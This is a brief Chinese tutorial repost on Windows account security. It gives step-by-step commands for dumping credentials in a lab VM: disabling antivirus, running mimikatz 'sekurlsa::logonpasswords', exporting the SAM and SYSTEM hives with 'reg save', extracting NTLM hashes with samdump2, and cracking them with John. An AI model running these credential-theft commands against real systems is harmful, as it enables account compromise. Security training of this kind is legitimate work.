本文主要是介绍windows账户安全(通过mimikatz、Jhon获取用户密码),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
1.获取Windows用户密码一mimikatz
打开windows server 2012虚拟机进入Administrator用户
第一步:首先关闭杀毒软件,接下来打开mimi katz.exe执行程序
第二步:提升到debug权限提示符下,输入命令 “privilege::debug”
第三步:输入抓取密码命令“sekurlsa::logonpasswords”,可以看到本机面已经获取,同时也可以看到抓取的密码。
2.使用jhon获取Windows用户密码
第一步:使用管理员权限,切换到c盘路径,执行命令“reg save hklm\sam sam.hive”和“reg save hklm\system system.hive”将注册表中SAM、System文件导出到本地磁盘。
第二步:把sam.hive和system.hive两个文件放到安装了John的Kali目录下, 执行命令将哈希提取到hash.txt文件中。其使用了sam dump 2工具将sam数据库文件破解成可识别的NTLM hash。
ls 查看目录
cd Desktop 切换到桌面目录
ls 查看目录
命令“ samdump2 system.hive sam.hive > hash.txt ” 使用sam dump 2工具将sam数据库文件破解成可识别的NTLM hash
cat hash.txt 查看hash.txt文件信息
第三步:使用John破解NTLM hash。使用命令“john-format=NT hash.txt”使用Jhon自带的字典碰撞hash值进行破解。使用命令“john--show-format=NT hash.txt”查看破解结果。
这篇关于windows账户安全(通过mimikatz、Jhon获取用户密码)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!